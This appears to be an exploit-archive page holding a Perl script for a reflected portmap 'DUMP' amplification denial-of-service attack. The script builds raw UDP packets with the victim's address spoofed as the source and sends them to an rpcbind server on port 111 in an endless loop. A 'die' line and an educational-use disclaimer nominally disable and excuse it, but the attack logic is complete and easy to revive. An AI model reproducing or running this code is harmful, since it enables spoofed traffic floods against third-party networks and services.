rpcinfo Portmap DUMP Call Amplification Distributed Denial Of Service

Published
Credit
Risk
2017.07.05
Todor Donev
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

#!/usr/bin/perl
#
#
# rpcinfo Portmap 'DUMP' call amplification ddos
#
# Copyright 2017 (c) Todor Donev
# todor.donev@gmail.com
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
#
use Net::RawIP;

my $target = "$ARGV[0]";
my $rpcamp = "$ARGV[1]";
die("r34d 7h3 c0d3 m0r0n\n");
my $rpcinfo = pack ("H8", int(rand(0x10000000)))."\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00";
$rpcinfo .= "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

print "[ rpcinfo Portmap 'DUMP' call amplification ddos\n";
print "[ === \n";
print "[ Copyright 2017 (c) Todor Donev\n";
print "[ todor.donev\@gmail.com\n";
print "[ https://www.ethical-hacker.org/\n";
print "[ https://www.facebook.com/ethicalhackerorg\n";


my $sock = new Net::RawIP({ udp => {} });
while () {
select(undef, undef, undef, 0.30);
my $randsport = int(rand(65535));
$sock->set({ ip => { saddr => $target, daddr => $rpcamp},
udp => { source => $randsport, dest => 111, data => $rpcinfo} });
$sock->send;
}


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com